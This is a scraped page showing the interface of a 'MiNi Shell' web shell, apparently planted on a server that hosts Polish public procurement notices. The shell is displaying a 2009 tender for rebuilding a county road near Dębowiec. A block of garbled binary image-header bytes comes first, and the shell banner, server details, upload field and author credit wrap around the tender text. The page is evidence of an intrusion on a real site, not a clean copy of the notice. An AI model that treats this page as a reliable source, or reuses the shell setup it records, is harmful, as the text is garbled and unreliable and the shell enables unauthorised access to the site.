JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/19108-N-2009.html

<p class="kh_header"><b>Ząbkowice Śląskie: Przebudowa drogi powiatowej nr 3189D w m.Dębowiec, Powiat Ząbkowicki, Gmina Ziębice.</b><br>
<b>Numer ogłoszenia: 19108 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ząbkowicki , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 3189D w m.Dębowiec, Powiat Ząbkowicki, Gmina Ziębice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Przebudowa drogi powiatowej nr 3189D w m.Dębowiec, Powiat Ząbkowicki, Gmina Ziębice.
    Zakres przebudowy obejmuje odcinek drogi nr 3189 o długości  2,967 km - początek w 
    m.Dębowiec km 2+869 do km. 5+836 granica województwa   
    Zakres robót obejmuje:
    - wzmocnienie istniejącej nawierzchni na pow.15.200m2 ,
    - wykonanie w części drogi chodników o pow.857,9 m2 ,
    - zatoki autobusowej, 
    - kanalizacji deszczowej na odcinku 586,6 mb.
    - udrożnienie istniejących rowów i wykonanie nowych,
    - budowę nowych i wymianę starych przepustów pod drogami 21,0mb oraz zjazdami 116,0mb.
    - karczowanie krzaków. 
    Szczegółowo przedmiot zamówienia określa:
    - projekt budowlano-wykonawczy  - zał. nr 8 do SIWZ
    - specyfikacje techniczne wykonania i odbioru robót budowlanych - zał. nr 9 do  SIWZ,  
   -  przedmiar robót - zał. nr 10 do SIWZ, 
   2. Udział podwykonawców w realizacji zamówienia.
    Zamawiający dopuszcza powierzenie wykonania części zamówienia podwykonawcom.
    Wykonawca wskaże w ofercie części zamówienia, które zamierza powierzyć do wykonania
    podwykonawcom. 
3. Wykonawca udzieli pisemnej gwarancji i rękojmi objęte przedmiotem zamówienia na okres 
    minimum 36 miesięcy od daty odbioru końcowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 80.000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w 
    art.22 ust.1 ustawy Prawo zamówień publicznych tj,
    1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
        nakładają obowiązek posiadania takich uprawnień,
    2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 
        zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów    
        do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
        - wykonali, co najmniej 2 roboty budowlane w zakresie budowy, przebudowy dróg min. 
           kategorii  L o długości min.3 km o podobnym charakterze i złożoności i wartości nie mniejszej 
           niż 3.000.000 zł.
        - dysponują  kierownikiem budowy, kierownikiem robót drogowych i sieci sanitarnych 
           posiadających odpowiednie uprawnienia budowlane, legitymującym się minimum 3 letnim 
           doświadczeniem przy realizacji zadań obejmujących przebudowę lub budowę dróg, klasy co 
           najmniej L i są  wpisani na listę członków właściwej izby samorządu zawodowego,
    3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
    4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na mocy art. 24 ust.1 i 2 
        ustawy Pzp.
2. Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nieposiadająca 
     osobowości prawnej albo podmioty te występujące wspólnie. W przypadku złożenia oferty 
     wspólnej  warunek  pkt.4 muszą spełniać wszyscy Wykonawcy składający ofertę wspólną, 
     warunek pkt.2 dowolny Wykonawca.
3. W przypadku składania oferty przez wykonawców występujących wspólnie, wykonawcy 
    ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo 
     reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
     Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej 
     przez notariusza.
4. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub 
    nienależyte wykonanie zobowiązań   5. W przypadku dokonania wyboru oferty wykonawcy występującego wspólnie przed przystąpieniem 
    do zawarcia umowy o zamówienie publiczne przedłożona zostanie umowa regulującą współpracę 
    wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa wykonawców nie 
    może być krótszy od terminu określonego na wykonanie zamówienia.   6. Opis sposobu dokonywania oceny spełnienia warunków:
    Zamawiający dokonana oceny na podstawie analizy dokumentów dołączonych do oferty, które 
    zostały określone w Specyfikacji Istotnych Warunków Zamówienia zgodnie z formułą spełnia- nie 
    spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz oferty - z wykorzystaniem wzoru zał. nr 1 do SIWZ,
2. Kosztorys ofertowy - z wykorzystaniem wzoru zał. nr 2 do SIWZ
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
    ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
    terminu składania ofert, 
4. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów 
    prawa lub innych dokumentów rejestrowych,
     5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału 
         Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające 
         odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie 
         zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie 
         lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
         organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
6. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego 
    organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 
    ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania 
    ofert,.
7. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, 
    wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
 8. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art.22.
     ust.1 oraz art. 24 ust.1 i 2  ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru 
    zał. nr 3 do SIWZ. 
 9.Wykaz wykonanych co najmniej 2 robót budowlanych w zakresie budowy, przebudowy dróg   
    kategorii min.L w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie 
    zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających 
    swoim rodzajem i wartością stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat 
    wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że roboty zostały 
    wykonane należycie o długości min.3 km (w ramach jednego zadania lub dwóch zadań łącznie)
    i wartości nie mniejszej niż 3.000.000 zł - z wykorzystaniem wzoru zał. nr 4 do SIWZ. 
10.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie 
    dysponował wykonawca -  z wykorzystaniem wzoru zał. nr 5 do SIWZ. 
    W przypadku gdy Wykonawca będzie korzystał z narzędzi i urządzeń innych podmiotów
    niezbędnych do wykonania zamówienia, należy dołączyć do załącznika nr 5 pisemne zobowiązanie 
    tych podmiotów o ich udostępnieniu.
11.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
     wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
     doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu 
     wykonywanych przez nich czynności, lub przedstawić pisemne zobowiązanie innych podmiotów 
     do ich udostępnienia - z wykorzystaniem  wzoru zał.  nr 6 do SIWZ. 
    Do niniejszego wykazu należy załączyć dokumenty potwierdzające,  posiadane uprawnienia 
    budowlane, oraz  zaświadczenie o przynależności do właściwej izby samorządu zawodowego.
           W przypadku, gdy Wykonawca będzie korzystał z osób innych podmiotów należy do załącznika nr 7 
           dołączyć  pisemne zobowiązanie tych podmiotów  o udostępnieniu osób zdolnych do wykonania 
           zamówienia. 
12.Polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, że Wykonawca lub
    uczestnicy Konsorcjum wspólnie są ubezpieczeni od odpowiedzialności cywilnej w zakresie 
    prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 1.000.000 zł. na okres wykonania 
    zamówienia. 
14.Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca 
    posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność 
    kredytową wykonawcy na kwotę nie mniejszą niż 2.000.000 zł, wystawionej nie wcześniej niż
    3 miesiące przed upływem terminu składania ofert.   15.Zaakceptowany projekt umowy - załącznik nr 7 do SIWZ.
16.Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zabkowicki.powiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe  57-200 Zabkowice Śl. ul.Sienkiewicza 11 pok.110.Koszt specyfikacji w wersji papierowej 100zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2009 godzina 09:00, miejsce: Powiat Ząbkowicki
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie
Sekretariat pok.202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com